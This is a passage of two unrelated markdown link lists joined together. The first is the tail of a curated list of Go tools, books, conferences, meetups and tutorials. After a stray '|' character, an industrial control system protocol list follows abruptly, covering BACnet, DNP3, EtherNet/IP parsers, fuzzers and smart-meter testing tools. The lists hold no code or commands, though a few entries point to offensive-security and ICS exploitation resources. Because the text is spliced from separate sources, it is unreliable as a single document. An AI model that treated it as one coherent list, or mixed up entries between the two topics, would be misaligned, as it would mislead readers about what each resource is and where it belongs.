- [mockingjay](https://github.com/quii/mockingjay-server) - Fake HTTP servers and consumer driven contracts from one configuration file. You can also make the server randomly misbehave to help do more realistic performance tests.
- [myLG](https://github.com/mehrdadrad/mylg) - Command Line Network Diagnostic tool written in Go.
- [naclpipe](https://github.com/unix4fun/naclpipe) - Simple NaCL EC25519 based crypto pipe tool written in Go.
- [Neo-cowsay](https://github.com/Code-Hex/Neo-cowsay) - 🐮 cowsay is reborn. for a New Era.
- [nes](https://github.com/fogleman/nes) - Nintendo Entertainment System (NES) emulator written in Go.
- [Orbit](https://github.com/gulien/orbit) - A simple tool for running commands and generating files from templates.
- [peg](https://github.com/pointlander/peg) - Peg, Parsing Expression Grammar, is an implementation of a Packrat parser generator.
- [Plik](https://github.com/root-gg/plik) - Plik is a temporary file upload system (Wetransfer like) in Go.
- [portal](https://github.com/SpatiumPortae/portal) - Portal is a quick and easy command-line file transfer utility from any computer to another.
- [protoncheck](https://github.com/servusdei2018/protoncheck) - ProtonMail module for waybar/polybar/yabar/i3blocks.
- [restic](https://github.com/restic/restic) - De-duplicating backup program.
- [sake](https://github.com/alajmo/sake) - sake is a command runner for local and remote hosts.
- [scc](https://github.com/boyter/scc) - Sloc Cloc and Code, a very fast accurate code counter with complexity calculations and COCOMO estimates.
- [Seaweed File System](https://github.com/chrislusf/seaweedfs) - Fast, Simple and Scalable Distributed File System with O(1) disk seek.
- [shell2http](https://github.com/msoap/shell2http) - Executing shell commands via http server (for prototyping or remote control).
- [snap](https://github.com/intelsdi-x/snap) - Powerful telemetry framework.
- [Snitch](https://github.com/lucasgomide/snitch) - Simple way to notify your team and many tools when someone has deployed any application via Tsuru.
- [Stack Up](https://github.com/pressly/sup) - Stack Up, a super simple deployment tool - just Unix - think of it like 'make' for a network of servers.
- [stew](https://github.com/marwanhawari/stew) - An independent package manager for compiled binaries.
- [syncthing](https://syncthing.net/) - Open, decentralized file synchronization tool and protocol.
- [tcpdog](https://github.com/mehrdadrad/tcpdog) - eBPF based TCP observability.
- [tcpprobe](https://github.com/mehrdadrad/tcpprobe) - TCP tool for network performance and path monitoring, including socket statistics.
- [term-quiz](https://github.com/crazcalm/term-quiz) - Quizzes for your terminal.
- [toxiproxy](https://github.com/shopify/toxiproxy) - Proxy to simulate network and system conditions for automated tests.
- [tsuru](https://tsuru.io/) - Extensible and open source Platform as a Service software.
- [vaku](https://github.com/lingrino/vaku) - CLI & API for folder-based functions in Vault like copy, move, and search.
- [vFlow](https://github.com/VerizonDigital/vflow) - High-performance, scalable and reliable IPFIX, sFlow and Netflow collector.
- [wellington](https://github.com/wellington/wellington) - Sass project management tool, extends the language with sprite functions (like Compass).
- [woke](https://github.com/get-woke/woke) - Detect non-inclusive language in your source code.
- [zs](https://git.mills.io/prologic/zs) - an extremely minimal static site generator.
**[⬆ back to top](#contents)**
# Resources
_Where to discover new Go libraries._
**[⬆ back to top](#contents)**
## Benchmarks
- [autobench](https://github.com/davecheney/autobench) - Framework to compare the performance between different Go versions.
- [go-benchmark-app](https://github.com/mrLSD/go-benchmark-app) - Powerful HTTP-benchmark tool mixed with Аb, Wrk, Siege tools. Gathering statistics and various parameters for benchmarks and comparison results.
- [go-benchmarks](https://github.com/tylertreat/go-benchmarks) - Few miscellaneous Go microbenchmarks. Compare some language features to alternative approaches.
- [go-http-routing-benchmark](https://github.com/julienschmidt/go-http-routing-benchmark) - Go HTTP request router benchmark and comparison.
- [go-json-benchmark](https://github.com/zerosnake0/go-json-benchmark) - Go JSON benchmark.
- [go-ml-benchmarks](https://github.com/nikolaydubina/go-ml-benchmarks) - benchmarks for machine learning inference in Go.
- [go-web-framework-benchmark](https://github.com/smallnest/go-web-framework-benchmark) - Go web framework benchmark.
- [go_serialization_benchmarks](https://github.com/alecthomas/go_serialization_benchmarks) - Benchmarks of Go serialization methods.
- [gocostmodel](https://github.com/PuerkitoBio/gocostmodel) - Benchmarks of common basic operations for the Go language.
- [golang-sql-benchmark](https://github.com/tyler-smith/golang-sql-benchmark) - Collection of benchmarks for popular Go database/SQL utilities.
- [gospeed](https://github.com/feyeleanor/GoSpeed) - Go micro-benchmarks for calculating the speed of language constructs.
- [kvbench](https://github.com/jimrobinson/kvbench) - Key/Value database benchmark.
- [skynet](https://github.com/atemerev/skynet) - Skynet 1M threads microbenchmark.
- [speedtest-resize](https://github.com/fawick/speedtest-resize) - Compare various Image resize algorithms for the Go language.
**[⬆ back to top](#contents)**
## Conferences
- [GoCon](https://gocon.connpass.com/) - Tokyo, Japan.
- [GoDays](https://www.godays.io/) - Berlin, Germany.
- [GoLab](https://golab.io/) - Florence, Italy.
- [GopherChina](https://gopherchina.org) - Shanghai, China.
- [GopherCon](https://www.gophercon.com/) - Denver, USA.
- [GopherCon Australia](https://gophercon.com.au/) - Sydney, Australia.
- [GopherCon Brazil](https://gopherconbr.org) - Florianópolis, Brazil.
- [GopherCon Europe](https://gophercon.eu/) - Berlin, Germany.
- [GopherCon India](https://www.gophercon.in/) - Pune, India.
- [GopherCon Israel](https://www.gophercon.org.il/) - Tel Aviv, Israel.
- [GopherCon Russia](https://www.gophercon-russia.ru) - Moscow, Russia.
- [GopherCon Singapore](https://gophercon.sg) - Mapletree Business City, Singapore.
- [GopherCon UK](https://www.gophercon.co.uk/) - London, UK.
- [GopherCon Vietnam](https://gophercon.vn/) - Ho Chi Minh City, Vietnam.
- [GoWest Conference](https://www.gowestconf.com/) - Lehi, USA.
**[⬆ back to top](#contents)**
## E-Books
### E-books for purchase
- [100 Go Mistakes: How to Avoid Them](https://www.manning.com/books/100-go-mistakes-how-to-avoid-them)
- [Black Hat Go](https://nostarch.com/blackhatgo) - Go programming for hackers and pentesters.
- [Build an Orchestrator in Go](https://www.manning.com/books/build-an-orchestrator-in-go)
- [Continuous Delivery in Go](https://www.manning.com/books/continuous-delivery-in-go) - This practical guide to continuous delivery shows you how to rapidly establish an automated pipeline that will improve your testing, code quality, and final product.
- [Creative DIY Microcontroller Project With TinyGo and WebAssembly](https://www.packtpub.com/product/creative-diy-microcontroller-projects-with-tinygo-and-webassembly/9781800560208) - An introduction into the TinyGo compiler with projects involving Arduino and WebAssembly.
- [Effective Go: Elegant, efficient, and testable code](https://www.manning.com/books/effective-go) - Unlock Go’s unique perspective on program design, and start writing simple, maintainable, and testable Go code.
- [For the Love of Go](https://bitfieldconsulting.com/books/love) - An introductory book for Go beginners.
- [Go Faster](https://leanpub.com/gofaster) - This book seeks to shorten your learning curve and help you become a proficient Go programmer, faster.
- [Know Go: Generics](https://bitfieldconsulting.com/books/generics) - A guide to understanding and using generics in Go.
- [Lets-Go](https://lets-go.alexedwards.net) - A step-by-step guide to creating fast, secure and maintanable web applications with Go.
- [Lets-Go-Further](https://lets-go-further.alexedwards.net) - Advanced patterns for building APIs and web applications in Go.
- [The Power of Go: Tests](https://bitfieldconsulting.com/books/tests) - A guide to testing in Go.
- [The Power of Go: Tools](https://bitfieldconsulting.com/books/tools) - A guide to writing command-line tools in Go.
- [Writing A Compiler In Go](https://compilerbook.com)
- [Writing An Interpreter In Go](https://interpreterbook.com) - Book that introduces dozens of techniques for writing idiomatic, expressive, and efficient Go code that avoids common pitfalls.
### Free e-books
- [A Go Developer's Notebook](https://leanpub.com/GoNotebook/read)
- [An Introduction to Programming in Go](http://www.golang-book.com/)
- [Build Web Application with Golang](https://astaxie.gitbooks.io/build-web-application-with-golang/content/en/)
- [Building Web Apps With Go](https://codegangsta.gitbooks.io/building-web-apps-with-go/content/)
- [Go 101](https://go101.org) - A book focusing on Go syntax/semantics and all kinds of details.
- [Go AST Book (Chinese)](https://github.com/chai2010/go-ast-book) - A book focusing on Go `go/*` packages.
- [Go Succinctly](https://github.com/thedevsir/gosuccinctly) - in Persian.
- [GoBooks](https://github.com/dariubs/GoBooks) - A curated list of Go books.
- [How To Code in Go eBook](https://www.digitalocean.com/community/books/how-to-code-in-go-ebook) - A 600 page introduction to Go aimed at first time developers.
- [Learning Go](https://www.miek.nl/downloads/Go/Learning-Go-latest.pdf)
- [Network Programming With Go](https://jan.newmarch.name/golang/)
- [Practical Go Lessons](https://www.practical-go-lessons.com/)
- [Spaceship Go A Journey to the Standard Library](https://blasrodri.github.io/spaceship-go-gh-pages/)
- [The Go Programming Language](https://www.gopl.io/)
- [The Golang Standard Library by Example (Chinese)](https://github.com/polaris1119/The-Golang-Standard-Library-by-Example)
- [Web Application with Go the Anti-Textbook](https://github.com/thewhitetulip/web-dev-golang-anti-textbook/)
**[⬆ back to top](#contents)**
## Gophers
- [Free Gophers Pack](https://github.com/MariaLetta/free-gophers-pack) - Gopher graphics pack by Maria Letta with illustrations and emotional characters in vector and raster.
- [Go-gopher-Vector](https://github.com/keygx/Go-gopher-Vector) - Go gopher Vector Data [.ai, .svg].
- [gopher-logos](https://github.com/GolangUA/gopher-logos) - adorable gopher logos.
- [gopher-stickers](https://github.com/tenntenn/gopher-stickers)
- [gophericons](https://github.com/shalakhin/gophericons)
- [gopherize.me](https://github.com/matryer/gopherize.me) - Gopherize yourself.
- [gophers](https://github.com/ashleymcnamara/gophers) - Gopher artworks by Ashley McNamara.
- [gophers](https://github.com/egonelbre/gophers) - Free gophers.
- [gophers](https://github.com/rogeralsing/gophers) - random gopher graphics.
- [gophers](https://github.com/sillecelik/go-gopher) - Gopher amigurumi toy pattern.
- [gophers](https://github.com/scraly/gophers) - Gophers by Aurélie Vache.
**[⬆ back to top](#contents)**
## Meetups
- [Basel Go Meetup](https://www.meetup.com/Basel-Go-Meetup/)
- [Belfast Gophers](https://www.meetup.com/Belfast-Gophers/)
- [Belgrade Golang Meetup](https://www.meetup.com/golang-serbia/)
- [Berlin Golang](https://www.meetup.com/golang-users-berlin/)
- [Brisbane Gophers](https://www.meetup.com/Brisbane-Golang-Meetup/)
- [Canberra Gophers](https://www.meetup.com/Canberra-Gophers/)
- [Go Language NYC](https://www.meetup.com/golanguagenewyork/)
- [Go London User Group](https://www.meetup.com/Go-London-User-Group/)
- [Go Remote Meetup](https://www.meetup.com/Go-Remote-Meetup/)
- [Go Toronto](https://www.meetup.com/go-toronto/)
- [Go User Group Atlanta](https://www.meetup.com/Go-Users-Group-Atlanta/)
- [GoBandung](https://www.meetup.com/GoBandung/)
- [GoBridge, San Francisco, CA](https://www.meetup.com/gobridge/)
- [GoCracow - Krakow, Poland](https://www.meetup.com/GoCracow/)
- [GoJakarta](https://www.meetup.com/GoJakarta/)
- [Golang Amsterdam](https://www.meetup.com/golang-amsterdam/)
- [Golang Argentina](https://www.meetup.com/Golang-Argentina/)
- [Golang Athens](https://www.meetup.com/Athens-Gophers/)
- [Golang Baltimore, MD](https://www.meetup.com/BaltimoreGolang/)
- [Golang Bangalore](https://www.meetup.com/Golang-Bangalore/)
- [Golang Belo Horizonte - Brazil](https://www.meetup.com/go-belo-horizonte/)
- [Golang Boston](https://www.meetup.com/bostongo/)
- [Golang Bulgaria](https://www.meetup.com/Golang-Bulgaria/)
- [Golang Cardiff, UK](https://www.meetup.com/Cardiff-Go-Meetup/)
- [Golang Copenhagen](https://www.meetup.com/Go-Cph/)
- [Golang Curitiba - Brazil](https://www.meetup.com/GolangCWB/)
- [Golang DC, Arlington, VA](https://www.meetup.com/Golang-DC/)
- [Golang Dorset, UK](https://www.meetup.com/golang-dorset/)
- [Golang Estonia](https://www.meetup.com/Golang-Estonia/)
- [Golang Gurgaon, India](https://www.meetup.com/Gurgaon-Go-Meetup/)
- [Golang Hamburg - Germany](https://www.meetup.com/Go-User-Group-Hamburg/)
- [Golang Israel](https://www.meetup.com/Go-Israel/)
- [Golang Kathmandu](https://www.meetup.com/Golang-Kathmandu/)
- [Golang Korea](https://www.meetup.com/GDG-Golang-Korea/)
- [Golang Lima - Peru](https://www.meetup.com/Golang-Peru/)
- [Golang Lyon](https://www.meetup.com/Golang-Lyon/)
- [Golang Marseille](https://www.meetup.com/fr-FR/Golang-Marseille/)
- [Golang Melbourne](https://www.meetup.com/golang-mel/)
- [Golang Mountain View](https://www.meetup.com/Golang-Mountain-View/)
- [Golang North East](https://www.meetup.com/en-AU/Golang-North-East/)
- [Golang Paris](https://www.meetup.com/Golang-Paris/)
- [Golang Poland](https://www.meetup.com/Golang-Poland/)
- [Golang Pune](https://www.meetup.com/Golang-Pune/)
- [Golang Rotterdam](https://www.meetup.com/golang-rotterdam/)
- [Golang Singapore](https://www.meetup.com/golangsg/)
- [Golang Stockholm](https://www.meetup.com/Go-Stockholm/)
- [Golang Sydney, AU](https://www.meetup.com/golang-syd/)
- [Golang São Paulo - Brazil](https://www.meetup.com/golangbr/)
- [Golang Taipei](https://www.meetup.com/golang-taipei-meetup/)
- [Golang Thessaloniki](https://www.meetup.com/thessaloniki-golang-meetup/)
- [Golang Turkey](https://kommunity.com/goturkiye)
- [Golang Vancouver, BC](https://www.meetup.com/golangvan/)
- [Golang Vienna, Austria](https://www.meetup.com/viennago/)
- [Golang Москва](https://www.meetup.com/Golang-Moscow/)
- [GoSF - San Francisco, CA](https://www.meetup.com/golangsf)
- [Istanbul Golang](https://www.meetup.com/Istanbul-Golang/)
- [Seattle Go Programmers](https://www.meetup.com/golang/)
- [Ukrainian Golang User Groups](https://www.meetup.com/uagolang/)
- [Utah Go User Group](https://www.meetup.com/utahgophers/)
- [Women Who Go - San Francisco, CA](https://www.meetup.com/Women-Who-Go/)
_Add the group of your city/country here (send **PR**)_
**[⬆ back to top](#contents)**
## Style Guides
- [bahlo/go-styleguide](https://github.com/bahlo/go-styleguide)
- [CockroachDB](https://github.com/cockroachdb/cockroach/blob/master/docs/style.md)
- [GitLab](https://docs.gitlab.com/ee/development/go_guide/)
- [Google](https://google.github.io/styleguide/go/)
- [Hyperledger](https://github.com/hyperledger/fabric/blob/release-1.4/docs/source/style-guides/go-style.rst)
- [Magnetico](https://github.com/boramalper/magnetico/wiki/magnetico-Design-Specification)
- [Sourcegraph](https://docs.sourcegraph.com/dev/background-information/languages/go)
- [Thanos](https://thanos.io/tip/contributing/coding-style-guide.md/)
- [Trybe](https://github.com/betrybe/playbook-go/blob/main/README_EN.md)
- [Uber](https://github.com/uber-go/guide/blob/master/style.md)
**[⬆ back to top](#contents)**
## Social Media
### Twitter
- [@GoDiscussions](https://twitter.com/GoDiscussions)
- [@golang](https://twitter.com/golang)
- [@golang_news](https://twitter.com/golang_news)
- [@golangch](https://twitter.com/golangch)
- [@golangflow](https://twitter.com/golangflow)
- [@golangweekly](https://twitter.com/golangweekly)
**[⬆ back to top](#contents)**
### Reddit
- [r/golang](https://www.reddit.com/r/golang/)
**[⬆ back to top](#contents)**
## Websites
- [Awesome Go @LibHunt](https://go.libhunt.com) - Your go-to Go Toolbox.
- [Awesome Golang Workshops](https://github.com/amit-davidson/awesome-golang-workshops) - A curated list of awesome golang workshops.
- [Awesome Remote Job](https://github.com/lukasz-madon/awesome-remote-job) - Curated list of awesome remote jobs. A lot of them are looking for Go hackers.
- [awesome-awesomeness](https://github.com/bayandin/awesome-awesomeness) - List of other amazingly awesome lists.
- [awesome-go-extra](https://github.com/xwjdsh/awesome-go-extra) - Parse awesome-go README file and generate a new README file with repo info.
- [Code with Mukesh](https://codewithmukesh.com/blog/category/golang) - Software Engineer and Blogs @ codewithmukesh.com.
- [Coding Mystery](https://codingmystery.com) - Solve exciting escape-room-inspired programming challenges using Go.
- [CodinGame](https://www.codingame.com/) - Learn Go by solving interactive tasks using small games as practical examples.
- [Explore Go Libraries & Projects](https://kandi.openweaver.com/explore/go) - Discover & find a curated list of popular & new Go libraries, top authors, trending project kits, discussions, tutorials & learning resources on kandi.
- [Go Blog](https://blog.golang.org) - The official Go blog.
- [Go Code Club](https://www.youtube.com/watch?v=nvoIPQYdx9g&list=PLEcwzBXTPUE_YQR7R0BRtHBYJ0LN3Y0i3) - A group of Gophers read and discuss a different Go project every week.
- [Go Community on Hashnode](https://hashnode.com/n/go) - Community of Gophers on Hashnode.
- [Go Forum](https://forum.golangbridge.org) - Forum to discuss Go.
- [Go Projects](https://github.com/golang/go/wiki/Projects) - List of projects on the Go community wiki.
- [Go Proverbs](https://go-proverbs.github.io/) - Go Proverbs by Rob Pike.
- [Go Report Card](https://goreportcard.com) - A report card for your Go package.
- [go.dev](https://go.dev/) - A hub for Go developers.
- [gocryforhelp](https://github.com/ninedraft/gocryforhelp) - Collection of Go projects that needs help. Good place to start your open-source way in Go.
- [godoc.org](https://godoc.org/) - Documentation for open source Go packages.
- [Golang Developer Jobs](https://golangjob.xyz) - Developer Jobs exclusively for Golang related Roles.
- [Golang Flow](https://golangflow.io) - Post Updates, News, Packages and more.
- [Golang News](https://golangnews.com) - Links and news about Go programming.
- [Golang Resources](https://golangresources.com) - A curation of the best articles, exercises, talks and videos to learn Go.
- [Golang Weekly](https://discu.eu/weekly/golang/) - Each monday projects, tutorials and articles about Go.
- [golang-graphics](https://github.com/mholt/golang-graphics) - Collection of Go images, graphics, and art.
- [golang-nuts](https://groups.google.com/forum/#!forum/golang-nuts) - Go mailing list.
- [Google Plus Community](https://plus.google.com/communities/114112804251407510571) - The Google+ community for #golang enthusiasts.
- [Gopher Community Chat](https://invite.slack.golangbridge.org) - Join Our New Slack Community For Gophers ([Understand how it came](https://blog.gopheracademy.com/gophers-slack-community/)).
- [Gophercises](https://gophercises.com/) - Free coding exercises for budding gophers.
- [gowalker.org](https://gowalker.org) - Go Project API documentation.
- [json2go](https://m-zajac.github.io/json2go) - Advanced JSON to Go struct conversion - online tool.
- [justforfunc](https://www.youtube.com/c/justforfunc) - Youtube channel dedicated to Go programming language tips and tricks, hosted by Francesc Campoy [@francesc](https://twitter.com/francesc).
- [Learn Go Programming](https://blog.learngoprogramming.com) - Learn Go concepts with illustrations.
- [Made with Golang](https://madewithgolang.com/?ref=awesome-go)
- [r/Golang](https://www.reddit.com/r/golang) - News about Go.
- [studygolang](https://studygolang.com) - The community of studygolang in China.
- [Trending Go repositories on GitHub today](https://github.com/trending?l=go) - Good place to find new Go libraries.
- [TutorialEdge - Golang](https://tutorialedge.net/course/golang/)
**[⬆ back to top](#contents)**
### Tutorials
- [50 Shades of Go](https://devs.cloudimmunity.com/gotchas-and-common-mistakes-in-go-golang/) - Traps, Gotchas, and Common Mistakes for New Golang Devs.
- [A Comprehensive Guide to Structured Logging in Go](https://betterstack.com/community/guides/logging/logging-in-go/) - Delve deep into the world of structured logging in Go with a specific focus on recently accepted slog proposal which aims to bring high performance structured logging with levels to the standard library.
- [A Guide to Golang E-Commerce](https://snipcart.com/blog/golang-ecommerce-ponzu-cms-demo?utm_term=golang-ecommerce-ponzu-cms-demo) - Building a Golang site for e-commerce (demo included).
- [A Tour of Go](https://tour.golang.org/) - Interactive tour of Go.
- [Build a Database in 1000 lines of code]( https://link.medium.com/O9YQlx89Htb) - Build a NoSQL Database From Zero in 1000 Lines of Code.
- [Build web application with Golang](https://github.com/astaxie/build-web-application-with-golang) - Golang ebook intro how to build a web app with golang.
- [Building and Testing a REST API in Go with Gorilla Mux and PostgreSQL](https://semaphoreci.com/community/tutorials/building-and-testing-a-rest-api-in-go-with-gorilla-mux-and-postgresql) - We’ll write an API with the help of the powerful Gorilla Mux.
- [Building Go Web Applications and Microservices Using Gin](https://semaphoreci.com/community/tutorials/building-go-web-applications-and-microservices-using-gin) - Get familiar with Gin and find out how it can help you reduce boilerplate code and build a request handling pipeline.
- [Caching Slow Database Queries](https://medium.com/@rocketlaunchr.cloud/caching-slow-database-queries-1085d308a0c9) - How to cache slow database queries.
- [Canceling MySQL](https://medium.com/@rocketlaunchr.cloud/canceling-mysql-in-go-827ed8f83b30) - How to cancel MySQL queries.
- [CodeCrafters Golang Track](https://app.codecrafters.io/tracks/go) - Achieve mastery in advanced Go by building your own Redis, Docker, Git, and SQLite. Featuring goroutines, systems programming, file I/O, and more.
- [Debugged.it Go patterns](https://github.com/haveyoudebuggedit/go-patterns) - Advanced Go patterns with ready-to-run examples.
- [Design Patterns in Go](https://github.com/shubhamzanwar/design-patterns) - Collection of programming design patterns implemented in Go.
- [Ethereum Development with Go](https://github.com/miguelmota/ethereum-development-with-go-book) - A little e-book on Ethereum Development with Go.
- [Games With Go](https://www.youtube.com/watch?v=9D4yH7e_ea8&list=PLDZujg-VgQlZUy1iCqBbe5faZLMkA3g2x) - A video series teaching programming and game development.
- [Go By Example](https://gobyexample.com/) - Hands-on introduction to Go using annotated example programs.
- [Go Cheat Sheet](https://github.com/a8m/go-lang-cheat-sheet) - Go's reference card.
- [Go database/sql tutorial](http://go-database-sql.org/) - Introduction to database/sql.
- [Go in 7 days](https://github.com/harrytran103/7_days_of_go) - Learn everything about Go in 7 days (from a Nodejs developer).
- [Go Language Tutorial](https://www.javatpoint.com/go-tutorial) - Learn Go language Tutorial.
- [Go Tutorial](https://www.tutorialspoint.com/go/index.htm) - Learn Go programming.
- [Go WebAssembly Tutorial - Building a Simple Calculator](https://tutorialedge.net/golang/go-webassembly-tutorial/)
- [go-clean-template](https://github.com/evrone/go-clean-template) - Clean Architecture template for Golang services.
- [go-patterns](https://github.com/tmrts/go-patterns) - Curated list of Go design patterns, recipes and idioms.
- [goapp](https://github.com/bnkamalesh/goapp) - An opinionated guideline to structure & develop a Go web application/service.
- [Golang for Node.js Developers](https://github.com/miguelmota/golang-for-nodejs-developers) - Examples of Golang compared to Node.js for learning.
- [Golang Tutorial Guide](https://www.freecodecamp.org/news/golang-tutorial-list-free-courses-learn-go-programming-language/) - A List of Free Courses to Learn the Go Programming Language.
- [Golangbot](https://golangbot.com/learn-golang-series/) - Tutorials to get started with programming in Go.
- [GopherCoding](https://gophercoding.com/) - Collection of code snippets and tutorials to help tackle every day issues.
- [GopherSnippets](https://gophersnippets.com/) - Code snippets with tests and testable examples for the Go programming language.
- [Gosamples](https://gosamples.dev/) - Collection of code snippets that let you solve everyday code problems.
- [Hackr.io](https://hackr.io/tutorials/learn-golang) - Learn Go from the best online golang tutorials submitted & voted by the golang programming community.
- [Hex Monscape](https://github.com/Haraj-backend/hex-monscape) - Getting started guidelines in writing maintainable code using Hexagonal Architecture.
- [How to Benchmark: dbq vs sqlx vs GORM](https://medium.com/@rocketlaunchr.cloud/how-to-benchmark-dbq-vs-sqlx-vs-gorm-e814caacecb5) - Learn how to benchmark in Go. As a case-study, we will benchmark dbq, sqlx and GORM.
- [How To Deploy a Go Web Application with Docker](https://semaphoreci.com/community/tutorials/how-to-deploy-a-go-web-application-with-docker) - Learn how to use Docker for Go development and how to build production Docker images.
- [How to Use Godog for Behavior-driven Development in Go](https://semaphoreci.com/community/tutorials/how-to-use-godog-for-behavior-driven-development-in-go) - Get started with Godog — a Behavior-driven development framework for building and testing Go applications.
- [Learn Go with 1000+ Exercises](https://github.com/inancgumus/learngo) - Learn Go with thousands of examples, exercises, and quizzes.
- [Learn Go with TDD](https://github.com/quii/learn-go-with-tests) - Learn Go with test-driven development.
- [Learning Go by examples](https://dev.to/aurelievache/learning-go-by-examples-introduction-448n) - Series of articles in order to learn Golang language by concrete applications as example.
- [Microservices with Go](https://www.youtube.com/playlist?list=PLmD8u-IFdreyh6EUfevBcbiuCKzFk0EW_) - Dive deep into building microservices using Go, including gRPC.
- [package main](https://www.youtube.com/packagemain) - YouTube channel about Programming in Go.
- [Programming with Google Go](https://www.coursera.org/specializations/google-golang) - Coursera Specialization to learn about Go from scratch.
- [Saving a Third of Our Memory by Re-ordering Go Struct Fields](https://qvault.io/golang/struct-field-ordering-memory/) - How inefficient field ordering in Go structs.
- [Scaling Go Applications](https://betterstack.com/community/guides/scaling-go/) - Everything about building, deploying and scaling Go applications in production.
- [The world’s easiest introduction to WebAssembly with Golang](https://medium.com/@martinolsansky/webassembly-with-golang-is-fun-b243c0e34f02)
- [W3basic Go Tutorials](https://www.w3basic.com/golang/) - W3Basic provides an in-depth tutorial and well-organized content to learn Golang programming.
- [Working with Go](https://github.com/mkaz/working-with-go) - Intro to go for experienced programmers.
- [Your basic Go](https://yourbasic.org/golang) - Huge collection of tutorials and how to's.
**[⬆ back to top](#contents)**
### Guided Learning
- [The Go Developer Roadmap](https://roadmap.sh/golang) - A visual roadmap that new Go developers can follow through to help them learn Go.
- [The Go Learning Path](https://tutorialedge.net/paths/golang/) - A guided learning path containing a mix of free and premium resources.
**[⬆ back to top](#contents)**
|
# ICS Protocols
Developed as a community asset
## General / Miscellaneous Releases
- [ICS System Ports List](PORTS.md) - This is a list of common ICS tcp/udp ports.
- [PoC 2013 SCADA Release](https://github.com/atimorin/PoC2013) - Power of Community 2013 conference special release of ICS/SCADA toolkit
- [Industrial Control Systems Network Protocol Parsers (ICSNPP)](https://github.com/cisagov/ICSNPP) - DHS CISA Industrial Control Systems protocol parsers plugins for the Zeek network security monitoring framework
- [Triangle Microworks DTM](https://www.trianglemicroworks.com/products/testing-and-configuration-tools/dtm-pages/overview) - Distributed Test Manager (DTM) is a Windows® application that can simulate the SCADA communications in the substation and perform automated tests to confirm system or individual device behavior. **commercial**
- [Awesome Industrial Protocols](https://github.com/Orange-Cyberdefense/awesome-industrial-protocols) - Offensive security-oriented list of industrial network protocols resources, by Orange Cyberdefense Team.
## AMI
- [C1218 Termineter](https://github.com/GrayHatLabs/john_commor_c1218) - c1218 powermeter emulator
- [Newer Termineter](https://github.com/rsmusllp/termineter) - Smart Meter Security Testing Framework
- [Kamstrup Meter Protocol (KMP)](https://github.com/johnnykv/PyKamstrup) - TCP/IP Kamstrup Meter Protocol (KMP) implementation
## BACnet
### Protocol Implementation
- [Public Review of ASHRAE Standards](https://www.ashrae.org/technical-resources/standards-and-guidelines/read-only-versions-of-ashrae-standards) - A way to read some of the ASRAE standards that are out for public review.
- [BACpypes](https://github.com/JoelBender/bacpypes) - BACpypes provides a BACnet application layer and network layer written in Python for daemons, scripting, and graphical interfaces.
- [BACnet SC Reference Implementation](https://sourceforge.net/projects/bacnet-sc-reference-stack/) - BACnet Secure Connect Reference Implementation. More details about the standard [here](https://www.ashrae.org/file%20library/technical%20resources/bookstore/bacnet-sc-whitepaper-v15_final_20190521.pdf). Wireshark dissector docs [here](https://www.wireshark.org/docs/dfref/b/bscvlc.html)
- [BACnet Stack](https://github.com/bacnet-stack/bacnet-stack) - C stack for BACnet
### Protocol Parsers
- [zeek plugin bacnet](https://github.com/amzn/zeek-plugin-bacnet) - BACnet Zeek Plugin from Amazon
- [yet another zeek plugin bacnet](https://github.com/delta-2-4/Zeek-BACnetIP) - BACnet Zeek Plugin by Aaron Heller + [SANS whitepaper](https://www.sans.org/reading-room/whitepapers/ICS/paper/39240)
- [ICSNPP Bacnet for Zeek](https://github.com/cisagov/icsnpp-bacnet) - DHS CISA Bacnet parser for Zeek
### Fuzzing
- [Fuzzowski](https://github.com/nccgroup/fuzzowski/tree/master) - partially implemented BACnet fuzzing
## Bristol Standard Asynchronous Protocol (BSAP)
- [ICSNPP BSAP IP for Zeek](https://github.com/cisagov/icsnpp-bsap) - DHS CISA BSAP plugin for Zeek
## DNP3
### Protocol Implementation
- [OpenDNP3](https://github.com/automatak/dnp3) - Opendnp3 is the de facto reference implementation of IEEE-1815 (DNP3) provided under the Apache License.
- [pydnp3 wrapper](https://github.com/ChargePoint/pydnp3) - Python wrapper for opendnp3
- [DNP3 Simulator](https://github.com/automatak/dnp3-simulator) - Graphical DNP3 Master/Outstation simulator
- [PIFaceRTU](https://github.com/automatak/pifacertu) - Opendnp3 running on a Raspberry Pi with Piface I/O board
- [LangSec DNP3 Parser](https://github.com/Dartmouth-Trustlab/dnp3) - Parsing DNP3 using parser combinators in C.
- [Proxyd](https://github.com/Dartmouth-Trustlab/proxy) - TCP Proxy for testing hammer based parsers (such as the DNP3 parser above)
- [ICSNPP DNP3 for Zeek](https://github.com/cisagov/icsnpp-dnp3) - DHS CISA DNP3 logging extensions to Zeek
- [dnp3 - rust implementation](https://github.com/stepfunc/dnp3) - Rust implementation of DNP3 (IEEE 1815) with idiomatic bindings for C, .NET, and Java
### Traffic Generation
- [DNP3 Traffic Generation](https://github.com/iti/ics-trafficgen/) - OpenDNP3-based traffic generation that can take a profile of traffic, apply scriptable variation, and result in output of DNP3 traffic matching that profile.
- [DNP3Crafter](https://github.com/hpcn-uam/DNP3Crafter) - DNP3Crafter is a very simple Python script which use sockets to send precalculated DNP3 packets over TCP and allows you to choose the number of repetitions. It's use is designed for testing purposes.
### Fuzzing
- [AEGIS Fuzzer](https://www.automatak.com/aegis/) - Aegis™ is a smart fuzzing framework for a growing number of protocols that can identify robustness and security issues in communications software before it is deployed in a production system. **[commercial]** Early Open Source version is mirrored here: [Open-Source](/tools/mirrored/aegis-opensource/).
- [ICSFuzz](https://github.com/momalab/ICSFuzz) - an PLC-side fuzzing tool for uncovering vulnerabilities in ICS control applications.
## Ethercat
- [ICSNPP Ethercat for Zeek](https://github.com/cisagov/icsnpp-ethercat) - DHS CISA Ethercat plugin for Zeek
## Ethernet/IP and CIP
- [EtherNet/IP+CIP dissector for Scapy](https://github.com/scy-phy/scapy-cip-enip) - a Python library which can be used to interact with components of a network using ENIP (Ethernet/IP) and CIP (Common Industrial Protocol) protocols. It uses scapy to implement packet dissectors which are able to decode a part of the network traffic. These dissectors can also be used to craft packets, which allows directly communicating with the PLCs (Programmable Logic Controllers) of the network. [Use case](https://labs.mwrinfosecurity.com/blog/offensive-ics-exploitation-a-technical-description/)
- [Scapy implementation of DLR (Device Level Ring) protocol](https://github.com/scy-phy/scapy-dlr)
- [Zeek implementation for ethernet/ip](https://github.com/scy-phy/bro-cip-enip) - This repository contains the necessary files in order to inspect Ethernet/IP and Common Industrial Protocol packets with Zeek.
